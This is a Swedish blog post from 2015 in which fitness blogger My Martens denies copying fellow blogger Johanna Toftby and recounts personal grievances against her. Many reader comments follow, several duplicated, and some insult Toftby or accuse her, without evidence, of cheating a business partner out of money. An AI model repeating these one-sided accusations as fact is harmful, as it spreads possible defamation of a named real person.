Copycat 2015 -Toftby?

IMG_8587

Hej!

Jag brukar normalt sett inte bemöta elaka/taskiga kommentarer eller mail. Men ett återkommande faktum här inne och på mailen är alla uppdateringar om hur mycket skitsnack det är om mig inne på Johanna Toftbys blogg?!? -Varför?

Jag har inte svarat på detta eller heller bemött detta tidigare. Det har varken funnits tid lust eller energi till det.

Jag har undvikit att kasta bensin på elden och har medvetet valt att ignorera och istället hoppats att det ska rinna ut i sanden… utan resultat uppenbarligen… =(

Det återupprepas, gång på gång. Jag varken följer Johanna på bloggen eller instagram så det är vänner och bloggläsare till mig som hållit mig uppdaterad.

Jag har bara fortsatt att göra samma sak, ignorera det!

Men nu har till och med jag fått nog! Det skrivs att jag är en copycat som tar efter ALLT som Johanna gör, elaka påhopp och taskiga kommentarer!

När jag presenterade min och Pischas träningsresa till Thailand, så var skitsnacket igång igen, skriver jag träningsinlägg så börjas det igen, det skrivs att jag härmar hennes klädstil. Kör jag en utmaning på insta/blogg så härmar jag den också. osv osv..

Johanna bemöter det med kommentarer så som ”Vad roligt att jag kan inspirera andra bloggare också” eller ”är det sant, gör hon verkligen så”.

Istället för att tona ner så väljer hon istället ett sådant svar. Så hade inte jag bemött det. Men alla är vi olika.

Jag har själv hittills inte sagt ett enda ont ord om J Toftby, jag har valt att inte lägga mig på en så låg nivå. Jag har valt att stå över! Men nu är måttet rågat.

En fråga riktad till Johannes bloggläsare, -Vad är det jag kopierar? Varför lägger ni energin på mig???

Det är 2015, människor är mer träning/hälsoinriktade än på många år!

Utmaningar, tävlingar och recept avlöser varandra på bloggarna. Det är ingenting som varken jag eller Johanna har skapat! Jag har medvetet valt att ta ett avstånd till henne, samt att inte följa henne i sociala medier!

Detta pågrund av följande….

1: När jag träffade Johanna första gången så var det på en modevisning för Love Forever. Följande händer, jag går fram till Johanna för att presentera mig då hon lagt till mig på fb önskat mig lycka till inför Ensam Mamma Söker, Jag bemöts utav en arrogant, ganska otrevlig person som plötsligt ”låtsas” inte känna igen mig efter att själv sökt en kontakt med mig.

Jag lägger ingen vikt i detta utan tänker att hon förmodligen var stressad.

Inför, under och efter visningen ignorerar hon mig fullständigt, men är väldigit trevlig mot Sarah Tjulander, och Hannah Graaf som också var med på samma visning. Det skulle tas selfies och skapas kontakter. Det är uppenbart att hur viktigt det är vart stjärnglansen lyser mest.

Efter detta bjuder hon in alla FÖRUTOM mig till ett event på kvällen, i form utav en båt-tur och en massa gratis bubbel. Jag ignorerar även detta.

När dom andra tjejerna gått, och det bara är jag kvar så vänder hon sig till mig och frågar ”Vilket hotell bor du på?” Jag svarar att jag inte bor på Hotel. Följdfrågan kommer, -Vart bor du då?

Jag svarar att jag bor hos Magdalena.

Nästa fråga blir: -Graaf? -Ja, svarar jag kort.

Johanna utbrister exalterat -Men guuuuud, självklart så ska ni följa med på båten och dricka bubbel och ha skoj!

Jag svarar artigt men bestämt, -Tack, men vi har andra planer!

För mig och säkert för många andra blir det rätt tydligt vad detta visar på… eller vad tycker ni?

TVÅ: På nästa visning för Love Forever blir vi alla tjejer utbjudna på middag av Terece. Jag hamnar bredvid Johanna.

Mitt under middagen tar hon tag i mitt hår och utbrister ”detta är verkligen den fulaste hårförlängning jag sett, Alltså lilla gumman, jag kan klippa ihop det bättre med en köks-sax”….

Även denna gången ignorerar jag det, gör ingen grej utav det, håller mig på min kant.

Det förstärkte dock mitt första intryck jag fått av Toftby.

Jag väljer att fortsättningsvis hålla mig på min kant, hälsar artigt, men undviker henne maximalt de gånger vi träffas.

Det kom något sms där hon bad mig att länka ut och be mina läsare att rösta på henne då henens blogg var nominerad som ”Årets träningsblogg” Självklart gjorde jag det.

När min blogg sedan blev nominerad, tror du att hon länkade ut det? -Nej, det gjorde hon inte!

När Johanna i våras gjorde ett klantigt och provokativt blogginlägg om bildrättigheter så riktades det starkt emot mig. Detta gällde bilder som tagits i samband med en plåtning för Love Forever, där Love Forever äger rättigheterna, och hur dessa användes i sociala medier.

Jag sa ifrån inne på min blogg och instagram, jag försvarade mig ifrån påhoppen som då överöstes ifrån Johannas bloggläsare.

Jag skrev tydligt att det förmodligen inte var Johannas mening att rikta påhoppen emot mig…

Johanna ringde upp mig och krävde att jag skulle ta bort mitt inlägg, och hotade att få mitt instagram nerlagt.

jag svarade att jag tänkte låta det ligga kvar då mailen översvämmades utav elaka kommentarer ifrån hennes bloggläsare som efter henne inlägg trodde att jag ”stulit” hennes bilder.

Jag föreslog att hon skulle skriva ett nytt inlägg, där hon förklarade att det inte var riktat emot mig, och att jag på ett positivt sätt skulle besvara detta och att vi på så sätt skulle hålla en enad front och avdramatisera alltihopa.

Hon skulle ringa upp Janne och rådfråga, och återkomma till mig.

Johanna ringde aldrig mer och därefter har jag inte hört någonting ifrån henne.

Där någonstans bestämde jag mig för att inte ha någonting med henne att göra. Det tillsammans med det som händer nu inne på hennes blogg och min mail är droppen som fick bägaren att rinna över.

Det har hänt fler saker. Kan vara slumpen…. Men det känns lite för uppenbart. När jag t ex gick ut med min bukplastik, som jag gjorde efter tre års velande och hård träning med PT, Min bukmuskelatur var delad, ca 6.5 cm. Det GÅR inte att träna bort, man behöver sy ihop bukmuskelaturen för att kunna använda dom igen!!!

Plötsligt börjar Johanna med hashtag #detfinnsingagenvägar osv. hon började skriva om att man inte ska operera sig, utan att man ska träna för att uppnå sina resultat.

-Tror du att detta är en slump? Det tror inte jag.

Jag som fortfarande undviker Johanna i verkliga livet OCH sociala medier, vill ha så lite som möjligt med henne att göra pga av ovanstående situationer och MYCKET mer.

Jag hinner glömma bort hela grejen mellan varven men blir flitigt påmind då jag får denna informationen till mig utav blogg läsare, hennes, mina och gemensamma.

Förutom elakheterna emot så har jag tröstat ett FLERTAL väninnor som tidigare råkat ut för Johannas svek, och taskiga påhopp. Tråkigt.

Jag har själv läst mail som Johanna själv har skrivit till gemensamma sammarbetspartner, där hon på gränsen till förtal skriver rent och skärt skitsnack om mig! -Suck!

Även detta utan att säga ifrån, utan som vanligt bara ignorera alla hennes korkade utspel!

MEN nu har jag fått nog!!!!

Jag och Johanna har båda vart med i Ensam Mamma Söker, vi har båda gjort en viktresa och brinner för träning och hälsa.

That’s it! Vi har INGENTING gemensamt förutom det!!!

-Absolut ingenting!

Mina tränings resor, min krönika, mina modelljobb, mina sammarbets partner eller kommande projekt är ingenting som har med Johanna att göra!

Jag är smått chockad över hela grejen!

Jag skulle aldrig hinna lägga så mycket energi på andra människor, jag är ensamstående småbarnsförälder med tre företag och en massa järn i elden!

Jag omger mig med folk som ger energi, inte tar! Detta är dock extremt olik mig, att ge svar på tal, och att hänga ut en person och droppa vissa detaljer!

Men nån j-a gång så måste väl ändå detta beteende få ett slut!?!

Gillar man mig inte läs inte, gillar man den ena men inte den andra. låt det vara så, men bort med alla negativa kommentarer!

Och jag lovar er, jag kopierar INTE Toftby och har ni läst ända hit så tror jag ni förstår varför.

My Martens har fått nog av Johanna toftby, blogg, my martens style level,

Jag tror på karma.

Jag behandlar andra så som jag vill bli behandlad själv. Varför ska man trycka ner andra för att framstå som bättre själv?

Starka kvinnor ska istället lyfta, stötta och hjälp varandra! Så funkar iallafall jag och mina vänner.

Jag kan inte påverka varken Johanna eller hennes bloggläsare, men jag kan göra ett val.

Jag VÄLJER att säga ifrån och sedan vill jag inte ha något mer med henne eller skitsnacket att göra!!!!!

-End of story!

/ My Martens

290 Komentarer

 1. Äntligen någon som vågar ta bladet från mun och skriva sanningen om Toftby. Har sedan länge genomskådat henne och insett hur faksk och mediakåt hon är. Heja dig!!

  • Instämmer till fullo! Hade svårt för henne redan när hon var med i EMS då hon känns så genomfalsk o elak. En riktig ”mobbartyp”. Usch!!

 2. Hej!!
  Blir förstummad, följt er starka kvinnor oavsett ålder. Då jag vet att ensamstående kämpar hårt! Men du fortsätt du med det du brinner för, likt all business! Så finns konkurrens. Jag hoppas du orkar att ”dissa” Toftby med anhängare för hon kör sitt som ni andra kör sitt.
  54 kg bloggaren ligger ju ute med samma grejer som Toftby osv…
  Hon kör västkust du östkust, ja man blir ju ironisk.
  För läser man många bloggar är det likt överallt. Kör på o va stolt över dig!! Kram

 3. Hej my!Jag brukar inte kommentera såhär..Men blev så irreterad av detta..det luktar avundsjuka.. Du är en snygg tjej..intressant blogg..o de är bara kul att läsa o följa din resa..Johanna är en rynkig botox kärring som tror att hon och steka Janne är så mkt bättre än andra..vill synas i media..patetiskt.. O hennes blogg..Ja du..Inte intressant att läsa för 5 öre.Kör på som vanligt..skit i hennes dagis fasoner…PINSAMT kram

 4. Hej My
  Nu vet jag verkligen inget om varken dig eller henne egentligen…men min magkänsla säger mig att du är en ärlig och ödmjuk människa.
  Johanna…not so much…
  Villa bara säga det…stå på dig!

 5. Brukar inte kommentera men grymt ärligt inlägg. Precis som alltid! Därför jag gillar dig! Har slutat följa Johanna för längesedan för man orkar inte med henne helt enkelt….
  you go girl! Du är grym!!

 6. Grymt bra skrivet! Styrka till dig <3 Tycker att du skriver och lämnar ut dig på ett ärligt sätt. Du förskönar inte vardagen utan man får se att du kämpar på som vem som helst. Tack för en fin blogg <3

 7. Bra att du säger ifrån! Hon verkar fått lite för mkt uppmärksamhet som tyvärr inte gjort henne ödmjuk utan snarare tvärtom , jätte trist! Men som du säger karma! Man ska behandla andra som man själv vill bli behandlad, sanningen kommer alltid fram! Tycker du har en jätte bra blogg! Intressant, motiverande och personlig ! Stå på dig!!!!
  Lena

 8. Finaste My, you rock! Bra att du sätter ner foten! Lustigt för jag gick senast idag igenom mail och blev påmind om de förtal Toftbys läsare kastade mot mig i samband med det klumpiga blogginlägget om foton osv
  Jag mailade henne i samband med det…ingen kommentar trots de skador hennes inlägg ledde till och där och då stängde jag ner henne sida, aldrig att jag ger en sådan människa trafik eller reklam! Never!
  Det jag hört efteråt fick mina öron att ramla av och jag förstår att många valt att göra som jag.
  Det är osmakligt när framgång stiger folk över öronen!
  Gillar dig, det vet du efter det fina Samarbete vi hade under en period och jag gillar att du trots enorma framgångar med dina företag fortfarande står med både fötterna på
  Jorden!❤️
  Kram
  Alexandra

  • Hej fina Alexandra, blir nu påmind om det där blogginlägget. OCH blir så förbannad! Jag har aldrig fått se mail eller annat som Toftbys läsare skickat till Love Forevers återförsäljare på uppmaning av henne men jag kan ju bara ana vad det kan ha sabbat för mitt företag… blir mörkrädd!
   kram på dig

 9. Stå på dig. Strunta i henne. Hon e så där helt knas i mina ögon. Tränar till max o tycker hon e så snygg, nervärderar de som inte gör det på sitt insta. Hennes attityd lyser igenom både på hennes insta o på hennes blogg. Bara en massa besserwisser saker hela tiden o jag e bäst saker.

 10. Jag har aldrig kommenterat här någon gång, men nu var jag bara tvungen!
  Hejjjja dig My! Du är fantastisk! Ibland rinner bägaren över och de va nog nyttigt att få skriva av dig! Kram

 11. Följer Johanna på IG sen ganska länge men har ärligt talat sett en del tveksamheter från henne och vissa följare. Nu är måttet rågat här också. Inte ok att behandla ngn som hon behandlat dig! Avföljer henne härmed! Stor styrkekram till dig!

 12. Word!! Så väldigt bra skrivet! Helt riktigt att du tillslut slår näven i bordet och säger att det räcker. Älskar att följa din blogg och har väl försökt följa Johannas förut men inte gillat framlägget eller hennes personlighet.

 13. Kram till dig min FINA STARKA VÄN!
  Jag har själv blivit kallad WHITE TRASH av denna människa! Har hört företag berätta för mig vad Johanna sagt om mig. Och inte bara om mig för den delen, flera av oss har fått ta det skitsnacket!
  Och by the way…
  Om vi nu ska sncka om copycat, JAG började träna och utbilda mig till PT innan Toftby! Och långt innan det så slog Jane Fonda igenom – WHO IS THE FUCKING COPYCAT!
  Ja du fattar hur jag menar. Ingen vinner DEN tävlingen tyvärr!
  Precis som du skriver, vi vänner väljer att höja varandra istället. Tillsammans blir vi starkare <3
  Puss

 14. Hej My
  För mig är du inspirerande, tycker du är jätteduktig på det du gör.
  Det du skriver är nog garanterat något som många tycker och tänker, det har stigit henne lite väl mycket åt huvudet helt enkelt. Det ”avverkas” den ena efter den andra… som hon till slut ”brutit samarbete” med..,
  Kram till dig och starkt skrivet ❤️

 15. På Toftbys instagram står de i ett inlägg där hon klippt Janne…att hon skulle aldrig gå fram till nån o säga dom va ful i håret..som nu nån gjort om hennes Jannes frisyr & hår .åh läser i din blogg o detta inlägg att de är precis så hon gör…bra inlägg av dig My…

 16. Du är yngre men det är du My som varit den starka och mogna! Helt sjukt och så löjligt beteende från hennes sida! Läst hennes blogg och hon hatar celluliter och förlöjligat överviktiga. När jag kommenterat detta så får man arga svar. Mobbing så som hon uttrycker sig! Kram och fortsätt vara dig själv!

 17. YES ÄNTLIGEN någon som kan säga det alla blogglösare och instagramföljare tycker om Toftby! Så fruktansvärt tyket och noschigt hon svarar alla som inte tycker som hon. Hon kan helt enkelt inte ta kritik. Och att hon var ensådan vidrig människa innerst inne det visste vi nog alla. Du är bäst My. Kramisar på dig.

 18. Wiho äntligen någon som sätter ner foten och visar vart skåpet ska stå!
  Så otroligt bra skrivet My. Det är bara att du försöker att strunta i henne för hon skämmer bara ut sig hela tiden…
  Jag kan nog inte ens räkna hur många gånger jag har blivit irriterad på den där patetiska människan, och jag är verkligen ingen person som brukar tycka så, men hon har gått över gränsen för länge sedan och på flera olika sätt.
  Så stå på dig och kör ditt race så kommer allt bli kanon bra tillslut:) För du är i alla fall en person som är äkta, inspirerade och självklart ödmjuk!
  KRAM

 19. <3 När jag träffade dig på Tabataresan till Marbella blev jag helt tagen av din fina ärliga personlighet! Jag kommer ihåg att jag nämde Toftby o vi pratade ju ändå väldigt personligt men inte ett ont ord du sa om henne! Så det kan jag verkligen intyga att du inte pratar skit för att komma framåt själv! En mycket fin människa som jag önskar all lycka! <3 Kramar i massor! Karma Beach! Hihi….. Det säger jag rätt ofta! ? <3

 20. Bra skrivet ! Tycker att du verkar va en jordnära tjej och gör det som känns rätt för dig. Johanna har blivit ”stor på det” tycker jag och kändisvärlden är viktigast. kram

 21. Du verkar verkligen va en bra människa. Bra skrivit. Bra du sätter ned foten. Hon har verkligen gjort sig märkvärdig den sista tiden..
  jag tycker du har kämpat på bra efter operationen. Tck för att du delar med dig…

 22. Bra rutet My och stå på dig.
  Här skrev jag egentligen ett långt inlägg om varför jag slutade följa henne på både blogg och IG, men det kändes inte bra att publicera. Men jag kan säga att du är inte ensam om att känna olust.
  Kram från en som dagligen läser din blogg och IG, du verkar så go och snäll ?

 23. Hej my! Likt flera andra som kommenterat det här inlägget så brukar jag aldrig kommentera men känner att det här är ett bra läge. Kan börja med att säga att jag har följt Johanna sen hon var med i EMS och jag fick en bra uppfattning om henne. Visserligen var jag inte så gammal, är 20 år idag, och klok kanske men jag tyckte om henne. Sen av en ren slump läste jag kommentarerna på hennes blogg och blev förvånad över hur hon bemötte kritik. Att hon kan slänga ur sig ofantligt omogna och tykna kommentarer till någon som kommer med konstruktiv kritik för att, enligt min mening, enbart hjälpa henne till en trevlig blogg att läsa. Sen så en dag trillade jag in på din blogg, genom Magdalenas, och blev fast. Gillar det öppenhjärtliga och ärliga sättet du skriver på. Det är inga konstigheter med dig, man vet vad man får och det känns inte tillgjort. Till skillnad från toftby då. Jag diggar dig skarpt och hoppas att det här inte låter på Erika dig för mycket. Du är en kanonfin människa My. Jag backar dig i det här. Kram

 24. Äntligen någon som vågar ta bladet från mun och skriva sanningen om Toftby. Har sedan länge genomskådat henne och insett hur faksk och mediakåt hon är. Heja dig!!

  • Instämmer till fullo! Hade svårt för henne redan när hon var med i EMS då hon känns så genomfalsk o elak. En riktig ”mobbartyp”. Usch!!

 25. Hej!!
  Blir förstummad, följt er starka kvinnor oavsett ålder. Då jag vet att ensamstående kämpar hårt! Men du fortsätt du med det du brinner för, likt all business! Så finns konkurrens. Jag hoppas du orkar att ”dissa” Toftby med anhängare för hon kör sitt som ni andra kör sitt.
  54 kg bloggaren ligger ju ute med samma grejer som Toftby osv…
  Hon kör västkust du östkust, ja man blir ju ironisk.
  För läser man många bloggar är det likt överallt. Kör på o va stolt över dig!! Kram

 26. Hej my!Jag brukar inte kommentera såhär..Men blev så irreterad av detta..det luktar avundsjuka.. Du är en snygg tjej..intressant blogg..o de är bara kul att läsa o följa din resa..Johanna är en rynkig botox kärring som tror att hon och steka Janne är så mkt bättre än andra..vill synas i media..patetiskt.. O hennes blogg..Ja du..Inte intressant att läsa för 5 öre.Kör på som vanligt..skit i hennes dagis fasoner…PINSAMT kram

 27. Hej My

  Nu vet jag verkligen inget om varken dig eller henne egentligen…men min magkänsla säger mig att du är en ärlig och ödmjuk människa.
  Johanna…not so much…
  Villa bara säga det…stå på dig!

 28. Brukar inte kommentera men grymt ärligt inlägg. Precis som alltid! Därför jag gillar dig! Har slutat följa Johanna för längesedan för man orkar inte med henne helt enkelt….
  you go girl! Du är grym!!

 29. Grymt bra skrivet! Styrka till dig <3 Tycker att du skriver och lämnar ut dig på ett ärligt sätt. Du förskönar inte vardagen utan man får se att du kämpar på som vem som helst. Tack för en fin blogg <3

 30. Bra att du säger ifrån! Hon verkar fått lite för mkt uppmärksamhet som tyvärr inte gjort henne ödmjuk utan snarare tvärtom , jätte trist! Men som du säger karma! Man ska behandla andra som man själv vill bli behandlad, sanningen kommer alltid fram! Tycker du har en jätte bra blogg! Intressant, motiverande och personlig ! Stå på dig!!!!
  Lena

 31. Finaste My, you rock! Bra att du sätter ner foten! Lustigt för jag gick senast idag igenom mail och blev påmind om de förtal Toftbys läsare kastade mot mig i samband med det klumpiga blogginlägget om foton osv
  Jag mailade henne i samband med det…ingen kommentar trots de skador hennes inlägg ledde till och där och då stängde jag ner henne sida, aldrig att jag ger en sådan människa trafik eller reklam! Never!
  Det jag hört efteråt fick mina öron att ramla av och jag förstår att många valt att göra som jag.

  Det är osmakligt när framgång stiger folk över öronen!

  Gillar dig, det vet du efter det fina Samarbete vi hade under en period och jag gillar att du trots enorma framgångar med dina företag fortfarande står med både fötterna på
  Jorden!❤️
  Kram
  Alexandra

  • Hej fina Alexandra, blir nu påmind om det där blogginlägget. OCH blir så förbannad! Jag har aldrig fått se mail eller annat som Toftbys läsare skickat till Love Forevers återförsäljare på uppmaning av henne men jag kan ju bara ana vad det kan ha sabbat för mitt företag… blir mörkrädd!
   kram på dig

 32. Stå på dig. Strunta i henne. Hon e så där helt knas i mina ögon. Tränar till max o tycker hon e så snygg, nervärderar de som inte gör det på sitt insta. Hennes attityd lyser igenom både på hennes insta o på hennes blogg. Bara en massa besserwisser saker hela tiden o jag e bäst saker.

 33. Jag har aldrig kommenterat här någon gång, men nu var jag bara tvungen!
  Hejjjja dig My! Du är fantastisk! Ibland rinner bägaren över och de va nog nyttigt att få skriva av dig! Kram

 34. Följer Johanna på IG sen ganska länge men har ärligt talat sett en del tveksamheter från henne och vissa följare. Nu är måttet rågat här också. Inte ok att behandla ngn som hon behandlat dig! Avföljer henne härmed! Stor styrkekram till dig!

 35. Word!! Så väldigt bra skrivet! Helt riktigt att du tillslut slår näven i bordet och säger att det räcker. Älskar att följa din blogg och har väl försökt följa Johannas förut men inte gillat framlägget eller hennes personlighet.

 36. Kram till dig min FINA STARKA VÄN!

  Jag har själv blivit kallad WHITE TRASH av denna människa! Har hört företag berätta för mig vad Johanna sagt om mig. Och inte bara om mig för den delen, flera av oss har fått ta det skitsnacket!

  Och by the way…

  Om vi nu ska sncka om copycat, JAG började träna och utbilda mig till PT innan Toftby! Och långt innan det så slog Jane Fonda igenom – WHO IS THE FUCKING COPYCAT!

  Ja du fattar hur jag menar. Ingen vinner DEN tävlingen tyvärr!

  Precis som du skriver, vi vänner väljer att höja varandra istället. Tillsammans blir vi starkare <3

  Puss

 37. Hej My
  För mig är du inspirerande, tycker du är jätteduktig på det du gör.
  Det du skriver är nog garanterat något som många tycker och tänker, det har stigit henne lite väl mycket åt huvudet helt enkelt. Det ”avverkas” den ena efter den andra… som hon till slut ”brutit samarbete” med..,
  Kram till dig och starkt skrivet ❤️

 38. På Toftbys instagram står de i ett inlägg där hon klippt Janne…att hon skulle aldrig gå fram till nån o säga dom va ful i håret..som nu nån gjort om hennes Jannes frisyr & hår .åh läser i din blogg o detta inlägg att de är precis så hon gör…bra inlägg av dig My…

 39. Jag har inte läst din blogg många månader(kanske 7) men att du skulle apa efter någon annan har jag inte märkt. Vad jag fått för intryck är att du kör ditt egna rejs. Och att du hänger med vissa ”kända” människor bryr jag mig inte alls om för det är ditt liv och dina val.
  Tycker dock det är löjligt av båda att behöva försvara sig offentligt.

 40. Du är yngre men det är du My som varit den starka och mogna! Helt sjukt och så löjligt beteende från hennes sida! Läst hennes blogg och hon hatar celluliter och förlöjligat överviktiga. När jag kommenterat detta så får man arga svar. Mobbing så som hon uttrycker sig! Kram och fortsätt vara dig själv!

 41. YES ÄNTLIGEN någon som kan säga det alla blogglösare och instagramföljare tycker om Toftby! Så fruktansvärt tyket och noschigt hon svarar alla som inte tycker som hon. Hon kan helt enkelt inte ta kritik. Och att hon var ensådan vidrig människa innerst inne det visste vi nog alla. Du är bäst My. Kramisar på dig.

 42. Wiho äntligen någon som sätter ner foten och visar vart skåpet ska stå!
  Så otroligt bra skrivet My. Det är bara att du försöker att strunta i henne för hon skämmer bara ut sig hela tiden…
  Jag kan nog inte ens räkna hur många gånger jag har blivit irriterad på den där patetiska människan, och jag är verkligen ingen person som brukar tycka så, men hon har gått över gränsen för länge sedan och på flera olika sätt.
  Så stå på dig och kör ditt race så kommer allt bli kanon bra tillslut:) För du är i alla fall en person som är äkta, inspirerade och självklart ödmjuk!
  KRAM

 43. <3 När jag träffade dig på Tabataresan till Marbella blev jag helt tagen av din fina ärliga personlighet! Jag kommer ihåg att jag nämde Toftby o vi pratade ju ändå väldigt personligt men inte ett ont ord du sa om henne! Så det kan jag verkligen intyga att du inte pratar skit för att komma framåt själv! En mycket fin människa som jag önskar all lycka! <3 Kramar i massor! Karma Beach! Hihi….. Det säger jag rätt ofta! 😉 <3

 44. Bra skrivet ! Tycker att du verkar va en jordnära tjej och gör det som känns rätt för dig. Johanna har blivit ”stor på det” tycker jag och kändisvärlden är viktigast. kram

 45. Du verkar verkligen va en bra människa. Bra skrivit. Bra du sätter ned foten. Hon har verkligen gjort sig märkvärdig den sista tiden..

  jag tycker du har kämpat på bra efter operationen. Tck för att du delar med dig…

 46. Bra rutet My och stå på dig.
  Här skrev jag egentligen ett långt inlägg om varför jag slutade följa henne på både blogg och IG, men det kändes inte bra att publicera. Men jag kan säga att du är inte ensam om att känna olust.
  Kram från en som dagligen läser din blogg och IG, du verkar så go och snäll 🙂

 47. Hej my! Likt flera andra som kommenterat det här inlägget så brukar jag aldrig kommentera men känner att det här är ett bra läge. Kan börja med att säga att jag har följt Johanna sen hon var med i EMS och jag fick en bra uppfattning om henne. Visserligen var jag inte så gammal, är 20 år idag, och klok kanske men jag tyckte om henne. Sen av en ren slump läste jag kommentarerna på hennes blogg och blev förvånad över hur hon bemötte kritik. Att hon kan slänga ur sig ofantligt omogna och tykna kommentarer till någon som kommer med konstruktiv kritik för att, enligt min mening, enbart hjälpa henne till en trevlig blogg att läsa. Sen så en dag trillade jag in på din blogg, genom Magdalenas, och blev fast. Gillar det öppenhjärtliga och ärliga sättet du skriver på. Det är inga konstigheter med dig, man vet vad man får och det känns inte tillgjort. Till skillnad från toftby då. Jag diggar dig skarpt och hoppas att det här inte låter på Erika dig för mycket. Du är en kanonfin människa My. Jag backar dig i det här. Kram

 48. Jag har inte läst din blogg många månader(kanske 7) men att du skulle apa efter någon annan har jag inte märkt. Vad jag fått för intryck är att du kör ditt egna rejs. Och att du hänger med vissa ”kända” människor bryr jag mig inte alls om för det är ditt liv och dina val.

  Tycker dock det är löjligt av båda att behöva försvara sig offentligt.

 49. Helt rätt av dig att bemöta denna kritik .Hade jag vart du hade jag vart skogstokig . Hoppas verkligen du slipper tidningsrubriker typ som ”bloggkrig mellan My och Johanna ”..hahaha.

 50. Helt rätt av dig att bemöta denna kritik .Hade jag vart du hade jag vart skogstokig . Hoppas verkligen du slipper tidningsrubriker typ som ”bloggkrig mellan My och Johanna ”..hahaha.

 51. Så bra att du skriver ut detta, stor eloge. Du ska veta att vi som bor i Skövde (en del i alla fall) har sett hur denna människa förändrats sen hon ”klev fram i rampljuset”. Från att ha börjat sin ”kändisbana” i EMS till att bli kompis med Vincent shoes dåvarande ägare och figurera med honom i pressen till att efter det bli ”kompis” med ”finare” kändisar och byta upp sig allteftersom med ännu kändare människor att frottera sig med. Hennes ”kändisskap” har totalt stigit henne åt huvudet och som hon framställer sig idag är att hon tycker hon är bland de främsta i Sverige. Hela hon ger uttryck för ett omättat behov av uppmärksamhet, hon måste bara ha mer och mer. Bedrövligt att hon måste klanka ner på andra som ”stör” henne genom att vara bättre eller populärare. Hon ÄR en genomfalsk/elak människa, det kan nog alla bedyra som blivit utsatt för hennes påhopp eller blivit bortglömda när hon träffat någon i högre rang inom kändisskap och slängt bort den mindre kände eftersom den inte längre är intressant. Hon är en patetisk liten människa med väldigt gapig framtoning. Vi är många som undrat hur länge det ska dröja innan fler genomskådar henne. Äntligen skrev du detta My, så starkt gjort! Stor kram till Dig! Du verkar vara en supergo människa och är verkligen ingen copy cat!

 52. Johanna gjorde ett inlägg en gång om skönhetsoperationer, att hon aldrig skulle göra nåt sånt. Hon nedvärderade andra. Då skrev jag, men har inte du opererat brösten och då var det tydligen en helt annan sak. Jag har slutat följa henne, hon är bara för mkt. Kram & lycka till. Ärligheten vara längst!

 53. Kan inte mer än bara hålla med! Tycker att hon verkar vara en dryg otrevlig tjej! De gånger man skrivit på hennes insta är det bara otrevliga arroganta svar tillbaka! Hon är nog som hon spelar i reklaman… Ego! (Killen som springer in i rutan och det blir en fläck där hon just tvättat).
  Du är duktig, fortsätt så <3

 54. Smart, modig, snygg som f-n, driven, duktig och ödjmjuk och snäll! Det ÄR DU MY!!! Jag står ALLTID bakom dig! Du är BÄST! Du kommer gå så jäkla långt! Och det är du så väl värd!!!! Puss min vän

 55. Helt chockad!!! Följer er båda o tycker ni bägge verkar härliga! Inte ens tänkt tanken att nått du gör skulle va för att kopiera Johanna så fattar inte vad folk får det ifrån! Vet inte vad jag ska tycka om Johanna! Men nått jag stört mig på är när Johanna är på nått så är det såååååå grymt nästan lite överdrivet! Sen har jag funderat på varför man inte ser nått med Loveforever längre o varför hon inte umgås med hon Therese från Loveforever, va ju så mycket förr, nån mer som reagerat på det?

  • Det kan jag berätta! Hon blåste Therece på pengar. Betedde sig riktigt illa och bara drog när räkningen kom. Tyvärr har jag hört om detta beteende innan när det gäller henne. Fler vänner än Therece har blivit lurade.

 56. Hej My, jag förstår hur du tänker men jag undrar ändå varför du väljer att ta upp detta i ett blogginlägg där enbart dina åsikter och uppfattningar får plats? Jag vet att du kämpar hårt för ett bättre bloggklimat och detta gör väl inte det bättre? Nu kastar du ju faktiskt bensin på elden! Lite dubbelmoral? Vore det inte bättre att ta detta med henne personligen?

  • Jag måste försvara My. Hur mycket skitsnack och otrevliga kommentarer ska man behöva ta innan man får ryta ifrån? Att prata med JT verkar ju uppenbarligen inte lönt och ska hon då bara godta andra människors elaka kommentarer och inte få försvara sig?

 57. O varför gör hon inget med Michaela.c i Borås längre? Jag har för mig ang bilden med Loveforever att hon skrev att du fick låna den men att hon hade hört att andra utan tillstånd använde den??

 58. Hej My, har inte så bra koll på vad detta handlar om men funderar lite. Hade jag sett ett sådant här inlägg om mig själv där man inte får chansen att motargumentera så hade jag nog anmält. Känns inte rätt att du försöker förespråka att vi kvinnor ska hjälpa varandra samtidigt som du hänger ut en person på detta sätt. Inte bra alls!

  • Hon har väl samma chans att motargumentera precis som du gör nu om hon läser bloggen? Det är ju inte direkt hemligstämplat =)
   Jag tycker det är bra att My säger ifrån och försvarar sig. Man ska verkligen inte behöva ta skit i oändlighet och låta andra spy galla över en för att någon sprider falska rykten om en. Kan inte vara kul att läsa elaka kommentarer om att man ”härmar” någon annan ständigt och jämt.
   Och visst måste man kunna förespråka att stå upp för varandra och samtidigt få stå upp för sig själv. Tycker du inte det? =)

 59. Brukar aldrig kommentera men denna gången känner jag att jag måste. Det du säger stämmer precis in på bilden jag fått av henne ifrån hennes blogg och insta. Tänk att det kan lysa igenom så tydligt. Bra att du säger ifrån, ni är så långt ifrån varandra som man kan komma. Att någon ens tänker tanken att du skulle kopiera henne är för mig helt otroligt. Massa kramar fina du

 60. Så bra att du skriver ut detta, stor eloge. Du ska veta att vi som bor i Skövde (en del i alla fall) har sett hur denna människa förändrats sen hon ”klev fram i rampljuset”. Från att ha börjat sin ”kändisbana” i EMS till att bli kompis med Vincent shoes dåvarande ägare och figurera med honom i pressen till att efter det bli ”kompis” med ”finare” kändisar och byta upp sig allteftersom med ännu kändare människor att frottera sig med. Hennes ”kändisskap” har totalt stigit henne åt huvudet och som hon framställer sig idag är att hon tycker hon är bland de främsta i Sverige. Hela hon ger uttryck för ett omättat behov av uppmärksamhet, hon måste bara ha mer och mer. Bedrövligt att hon måste klanka ner på andra som ”stör” henne genom att vara bättre eller populärare. Hon ÄR en genomfalsk/elak människa, det kan nog alla bedyra som blivit utsatt för hennes påhopp eller blivit bortglömda när hon träffat någon i högre rang inom kändisskap och slängt bort den mindre kände eftersom den inte längre är intressant. Hon är en patetisk liten människa med väldigt gapig framtoning. Vi är många som undrat hur länge det ska dröja innan fler genomskådar henne. Äntligen skrev du detta My, så starkt gjort! Stor kram till Dig! Du verkar vara en supergo människa och är verkligen ingen copy cat!

 61. Johanna gjorde ett inlägg en gång om skönhetsoperationer, att hon aldrig skulle göra nåt sånt. Hon nedvärderade andra. Då skrev jag, men har inte du opererat brösten och då var det tydligen en helt annan sak. Jag har slutat följa henne, hon är bara för mkt. Kram & lycka till. Ärligheten vara längst!

